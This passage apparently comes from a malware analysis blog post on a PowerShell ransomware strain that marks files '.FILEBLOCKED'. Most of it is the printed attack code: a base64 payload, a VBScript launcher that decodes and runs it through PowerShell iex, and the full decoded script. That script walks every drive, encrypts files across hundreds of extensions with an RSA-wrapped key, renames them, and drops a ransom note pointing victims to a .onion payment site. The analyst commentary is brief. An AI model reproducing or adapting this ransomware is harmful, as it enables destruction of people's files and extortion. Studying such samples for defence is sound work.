rZVdVb0hUTGdoRz0iYXFlRmdCbGhhZ1BjWkJvTWtlV1VvSFRMZ2hHIjskVG9FbmNyeXB0PSRmaWxlLlJlYWQoJGJ1ZmYsIDAsICRidWZmLkxlbmd0aCk7JGFxZUZnQmxoYWdQY1pCb01rZVdVb0hUTGdoRz0iYXFlRmdCbGhhZ1BjWkJvTWtlV1VvSFRMZ2hHIjskWHFYTmtPYXNpTWFoYz0iWHFYTmtPYXNpTWFoYyI7JGZpbGUuUG9zaXRpb249JzAnOyRYcVhOa09hc2lNYWhjPSJYcVhOa09hc2lNYWhjIjskd3V0TGVJS2dEYUdOTm9iVEV0T0tkcW5GPSJ3dXRMZUlLZ0RhR05Ob2JURXRPS2RxbkYiOyRFbmNyeXB0ZWQ9RW5jcnlwdC1GaWxlICRidWZmICRlazskd3V0TGVJS2dEYUdOTm9iVEV0T0tkcW5GPSJ3dXRMZUlLZ0RhR05Ob2JURXRPS2RxbkYiOyRqY3B2VG5jYXd6b3lIZ0xGRkZUdlJrTnlPQnNZPSJqY3B2VG5jYXd6b3lIZ0xGRkZUdlJrTnlPQnNZIjskZmlsZS5Xcml0ZSgkRW5jcnlwdGVkLCAwLCAkRW5jcnlwdGVkLkxlbmd0aCk7JGpjcHZUbmNhd3pveUhnTEZGRlR2UmtOeU9Cc1k9ImpjcHZUbmNhd3pveUhnTEZGRlR2UmtOeU9Cc1kiOyRvVlB4YWVwc051bUxFQWRwSlFpVj0ib1ZQeGFlcHNOdW1MRUFkcEpRaVYiOyRmaWxlLkNsb3NlKCk7JG9WUHhhZXBzTnVtTEVBZHBKUWlWPSJvVlB4YWVwc051bUxFQWRwSlFpViI7JEJlYlNIdFdsQ3RRTHZqY0FsSVM9IkJlYlNIdFdsQ3RRTHZqY0FsSVMiOyRuZXduYW1lPSRfLk5hbWUrJy5GSUxFQkxPQ0tFRCc7JEJlYlNIdFdsQ3RRTHZqY0FsSVM9IkJlYlNIdFdsQ3RRTHZqY0FsSVMiOyRESG1adnJIZXRNPSJESG1adnJIZXRNIjtyZW4gLVBhdGggJF8uRnVsbE5hbWUgLU5ld05hbWUgJG5ld25hbWUgLUZvcmNlOyRESG1adnJIZXRNPSJESG1adnJIZXRNIjskWGdTQ1d4WW1iU1FBUndNcmdIeUpOcT0iWGdTQ1d4WW1iU1FBUndNcmdIeUpOcSI7JHBhdGg9JF8uRGlyZWN0b3J5TmFtZSsnXFJFQURfTUVfTk9XLmh0bWwnOyRYZ1NDV3hZbWJTUUFSd01yZ0h5Sk5xPSJYZ1NDV3hZbWJTUUFSd01yZ0h5Sk5xIjskSU9ZekpPTmFnUG9JQnRUVmxXem5aQmJzbmI9IklPWXpKT05hZ1BvSUJ0VFZsV3puWkJic25iIjtpZighKFRlc3QtUGF0aCAkcGF0aCkpe3NjIC1wYXQgJHBhdGggLXZhICR0ZXh0fSRJT1l6Sk9OYWdQb0lCdFRWbFd6blpCYnNuYj0iSU9ZekpPTmFnUG9JQnRUVmxXem5aQmJzbmIiOyRCV1FGT1FWT2NFaVJlem9GUz0iQldRRk9RVk9jRWlSZXpvRlMiO31jYXRjaHt9JEJXUUZPUVZPY0VpUmV6b0ZTPSJCV1FGT1FWT2NFaVJlem9GUyI7JHRJTHhKWElka1JnRmRlSERNakRpcUVmPSJ0SUx4SlhJZGtSZ0ZkZUhETWpEaXFFZiI7fX0kdElMeEpYSWRrUmdGZGVIRE1qRGlxRWY9InRJTHhKWElka1JnRmRlSERNakRpcUVmIjskTGNTV2ZmYW9rbW53WlNSc2xSVD0iTGNTV2ZmYW9rbW53WlNSc2xSVCI7JExjU1dmZmFva21ud1pTUnNsUlQ9IkxjU1dmZmFva21ud1pTUnNsUlQiOw==")

powershellArguments = " -command $path=(gc -Path '" + WshShell.ExpandEnvironmentStrings("%TMP%") & "\test.txt" + "' -totalcount 1);

$bytes = [System.Convert]::FromBase64String($path);

$decoded = [System.Text.Encoding]::UTF8.GetString($bytes);

iex $decoded"

powershellPath = oFolderItem.Path + "\WindowsPowerShell\v1.0\powershell.exe"

fullPowershellCommand = powershellPath + powershellArguments

If (oFileSystem.FileExists(powershellPath)) Then

WshShell.Run fullPowershellCommand, 0, False

Else

MsgBox "You need to download update for Windows XP KB968930(size 5.9 MB)" & Chr(13) & "Press OK to open www.microsoft.com, download and install update for your operation system.", 48, "Windows Update"

WshShell.Run "http://www.microsoft.com/en-us/download/details.aspx?id=16818"

End If

This code creates a file at “%TMP%\test.txt”, pushes the base64 encoded contents into it, checks that you have Powershell installed (and prompts you to install it via Microsoft Updates, if not), then proceeds to execute the base64 encoded file using Powershell.

After decoding the base64 string, the result is:

$ErrorActionPreference="SilentlyContinue";

if((gps -Name powershell).count -ge 2){exit}

$ref=[Reflection.Assembly]::LoadWithPartialName('System.Security');

Add-Type -Assembly System.Web;

$idpath=$env:APPDATA+"\"+(gwmi win32_computersystem).model;

if!(Test-Path $idpath){

exit#esli est file vihodim nah

}

$ek=[Web.Security.Membership]::GeneratePassword(41, 4);

$ek=$ek+((gwmi Win32_operatingsystem).Version).Substring(0,3)+"001"+"001";

[byte[]]$bytes=[system.Text.Encoding]::Unicode.GetBytes($ek);

Set-Content -Path $idpath -Value $ek.Substring(20,2);

$basekey="BgIAAACkAABSU0ExAAQAAAEAAQDTYUZyVxhh48R/1Y/H5NdEgi49DIHtJTXm+mcVHnvUpYiNEnxpFj/UJXVDg0F2rfWFpnyqHJ0dbyjsOCwMX0eRyp2VxrWFzOHIM6QpevxGF9izXeNq7+OzBuo11V/7EmvQBW2sfuNEOP7zdUw0DFKoK+X2Taewaki1LGYhpshjqg=="; // base64-encoded RSA key

$rsa=New-Object System.Security.Cryptography.RSACryptoServiceProvider;

$rsa.ImportCspBlob([system.Convert]::FromBase64String($basekey));

$enckey=[system.Convert]::ToBase64String($rsa.Encrypt($bytes, $false));

$text="<style>body{background-color:#30BDEB;}a:link{color:white;}a:visited{color:white;}a:visited{color:white;}</style><center>

If you read this message, it means that your computer was attacked by viruses.

All of your information (documents, films and other files) on this computer was encoded with the most cryptographically secure algorythm in the world RSA1024.

In order to restore your files, it is essential to download special browser and go to site <b>http://decoderswlezrsa7.onion</b><br><br>Sites in .onion band needs to visit using dedicated browser, follow these instructions and download it:

1. Go to page <a href='https://www.torproject.org/download/download-easy.html.en' target='_blank'>https://www.torproject.org/download/download-easy.html.en</a> and download TOR browser, and save it somewhere, then double click on it. Click on the button labeled '...' (1) and select where you want to save the bundle then click OK (2). At least 80 MB free space must be available in the location you select. If you want to leave the bundle on the computer, saving it to the Desktop is a good choice.

Click Extract (3) to begin extraction. This may take a few minutes to complete.

<img src='https://www.torproject.org/images/tbb-screenshot1.png'></img>

2. Once extraction is complete, open the folder Tor Browser from the location you saved the bundle. Double click on the Start Tor Browser (4) application (it called Start Tor Browser.exe)

<img src='https://www.torproject.org/images/tbb-screenshot2.png'></img>

3. Once Tor is ready, Tor Browser will automatically be opened. Only web pages visited through Tor Browser will be sent via Tor. Other web browsers such as Internet Explorer are not affected. If you did everything correctly, you will see in the browser window: 'Congratulations. Your browser is configured to use Tor.'<br><br><img src='https://www.torproject.org/images/tbb-screenshot3.png'></img>

4. Now go to website <b>http://decoderswlezrsa7.onion</b> in tor browser and follow the instructions.

Your personal ID: <input value='"+$enckey+"'></center>";

function Encrypt-File($item, $Passphrase){

$salt="FILEBLOCKED scrypt";

$init="FILEBLOCKED INIT";

$r=new-Object System.Security.Cryptography.RijndaelManaged;

$pass=[Text.Encoding]::UTF8.GetBytes($Passphrase);

$salt=[Text.Encoding]::UTF8.GetBytes($salt);

$r.Key=(new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, "SHA1", 5).GetBytes(32);

$r.IV=(new-Object Security.Cryptography.SHA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes($init))[0..15];

$r.Padding="Zeros";

$r.Mode="CBC";

$c=$r.CreateEncryptor();

$ms=new-Object IO.MemoryStream;

$cs=new-Object Security.Cryptography.CryptoStream $ms,$c,"Write";

$cs.Write($item, 0,$item.Length);

$cs.Close();

$ms.Close();

$r.Clear();

return $ms.ToArray();

}

$disks=gdr|where{$_.Free -gt 50000}|sort -Descending;

foreach($disk in $disks){

gci $disk.root -Recurse -Include "*.doc","*.xls","*.docx","*.xlsx","*.db","*.mp3","*.waw","*.jpg","*.jpeg","*.txt","*.rtf","*.pdf","*.rar","*.zip","*.psd","*.msi","*.tif","*.wma","*.lnk","*.gif","*.bmp","*.ppt","*.pptx","*.docm","*.xlsm","*.pps","*.ppsx","*.ppd","*.tiff","*.eps","*.png","*.ace","*.djvu","*.xml","*.cdr","*.max","*.wmv","*.avi","*.wav","*.mp4","*.pdd","*.html","*.css","*.php","*.aac","*.ac3","*.amf","*.amr","*.mid","*.midi","*.mmf","*.mod","*.mp1","*.mpa","*.mpga","*.mpu","*.nrt","*.oga","*.ogg","*.pbf","*.ra","*.ram","*.raw","*.saf","*.val","*.wave","*.wow","*.wpk","*.3g2","*.3gp","*.3gp2","*.3mm","*.amx","*.avs","*.bik","*.bin","*.dir","*.divx","*.dvx","*.evo","*.flv","*.qtq","*.tch","*.rts","*.rum","*.rv","*.scn","*.srt","*.stx","*.svi","*.swf","*.trp","*.vdo","*.wm","*.wmd","*.wmmp","*.wmx","*.wvx","*.xvid","*.3d","*.3d4","*.3df8","*.pbs","*.adi","*.ais","*.amu","*.arr","*.bmc","*.bmf","*.cag","*.cam","*.dng","*.ink","*.jif","*.jiff","*.jpc","*.jpf","*.jpw","*.mag","*.mic","*.mip","*.msp","*.nav","*.ncd","*.odc","*.odi","*.opf","*.qif","*.qtiq","*.srf","*.xwd","*.abw","*.act","*.adt","*.aim","*.ans","*.asc","*.ase","*.bdp","*.bdr","*.bib","*.boc","*.crd","*.diz","*.dot","*.dotm","*.dotx","*.dvi","*.dxe","*.mlx","*.err","*.euc","*.faq","*.fdr","*.fds","*.gthr","*.idx","*.kwd","*.lp2","*.ltr","*.man","*.mbox","*.msg","*.nfo","*.now","*.odm","*.oft","*.pwi","*.rng","*.rtx","*.run","*.ssa","*.text","*.unx","*.wbk","*.wsh","*.7z","*.arc","*.ari","*.arj","*.car","*.cbr","*.cbz","*.gz","*.gzig","*.jgz","*.pak","*.pcv","*.puz","*.r00","*.r01","*.r02","*.r03","*.rev","*.sdn","*.sen","*.sfs","*.sfx","*.sh","*.shar","*.shr","*.sqx","*.tbz2","*.tg","*.tlz","*.vsi","*.wad","*.war","*.xpi","*.z02","*.z04","*.zap","*.zipx","*.zoo","*.ipa","*.isu","*.jar","*.js","*.udf","*.adr","*.ap","*.aro","*.asa","*.ascx","*.ashx","*.asmx","*.asp","*.aspx","*.asr","*.atom","*.bml","*.cer","*.cms","*.crt","*.dap","*.htm","*.moz","*.svr","*.url","*.wdgt","*.abk","*.bic","*.big","*.blp","*.bsp","*.cgf","*.chk","*.col","*.cty","*.dem","*.elf","*.ff","*.gam","*.grf","*.h3m","*.h4r","*.iwd","*.ldb","*.lgp","*.lvl","*.map","*.md3","*.mdl","*.mm6","*.mm7","*.mm8","*.nds","*.pbp","*.ppf","*.pwf","*.pxp","*.sad","*.sav","*.scm","*.scx","*.sdt","*.spr","*.sud","*.uax","*.umx","*.unr","*.uop","*.usa","*.usx","*.ut2","*.ut3","*.utc","*.utx","*.uvx","*.uxx","*.vmf","*.vtf","*.w3g","*.w3x","*.wtd","*.wtf","*.ccd","*.cd","*.cso","*.disk","*.dmg","*.dvd","*.fcd","*.flp","*.img","*.iso","*.isz","*.md0","*.md1","*.md2","*.mdf","*.mds","*.nrg","*.nri","*.vcd","*.vhd","*.snp","*.bkf","*.ade","*.adpb","*.dic","*.cch","*.ctt","*.dal","*.ddc","*.ddcx","*.dex","*.dif","*.dii","*.itdb","*.itl","*.kmz","*.lcd","*.lcf","*.mbx","*.mdn","*.odf","*.odp","*.ods","*.pab","*.pkb","*.pkh","*.pot","*.potx","*.pptm","*.psa","*.qdf","*.qel","*.rgn","*.rrt","*.rsw","*.rte","*.sdb","*.sdc","*.sds","*.sql","*.stt","*.t01","*.t03","*.t05","*.tcx","*.thmx","*.txd","*.txf","*.upoi","*.vmt","*.wks","*.wmdb","*.xl","*.xlc","*.xlr","*.xlsb","*.xltx","*.ltm","*.xlwx","*.mcd","*.cap","*.cc","*.cod","*.cp","*.cpp","*.cs","*.csi","*.dcp","*.dcu","*.dev","*.dob","*.dox","*.dpk","*.dpl","*.dpr","*.dsk","*.dsp","*.eql","*.ex","*.f90","*.fla","*.for","*.fpp","*.jav","*.java","*.lbi","*.owl","*.pl","*.plc","*.pli","*.pm","*.res","*.rnc","*.rsrc","*.so","*.swd","*.tpu","*.tpx","*.tu","*.tur","*.vc","*.yab","*.8ba","*.8bc","*.8be","*.8bf","*.8bi8","*.bi8","*.8bl","*.8bs","*.8bx","*.8by","*.8li","*.aip","*.amxx","*.ape","*.api","*.mxp","*.oxt","*.qpx","*.qtr","*.xla","*.xlam","*.xll","*.xlv","*.xpt","*.cfg","*.cwf","*.dbb","*.slt","*.bp2","*.bp3","*.bpl","*.clr","*.dbx","*.jc","*.potm","*.ppsm","*.prc","*.prt","*.shw","*.std","*.ver","*.wpl","*.xlm","*.yps","*.md3","*.1cd"|

%{

try{

$file=[io.file]::Open($_, 'Open', 'ReadWrite');

if($file.Length -lt "40960"){

$size=$file.Length}else{$size="40960"}

[byte[]]$buff = new-object byte[] $size;

$ToEncrypt=$file.Read($buff, 0, $buff.Length);

$file.Position='0';

$Encrypted=Encrypt-File $buff $ek;

$file.Write($Encrypted, 0, $Encrypted.Length);

$file.Close();

$newname=$_.Name+'.FILEBLOCKED';

ren -Path $_.FullName -NewName $newname -Force;

$path=$_.DirectoryName+'\READ_ME_NOW.html';

if(!(Test-Path $path)){sc -pat $path -va $text}

}catch{}

}

}

The powershell script begins running through your drives, and encrypting every file with an extension in the array (Microsoft office files, documents, multimedia, archives, etc) and adds the “.FILEBLOCKED” extension.

The user is then given instructions on how to download Tor browser, visit a .onion service website, and (presumably) pay to get the decryption key and routine.